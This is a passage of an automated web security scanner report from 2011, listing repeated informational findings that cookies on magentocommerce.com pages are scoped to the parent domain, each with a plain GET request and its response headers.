The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.14. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.15. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.16. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.17. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.18. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.19. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.20. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.21. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.22. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.23. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.24. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.25. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.26. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.27. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.28. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
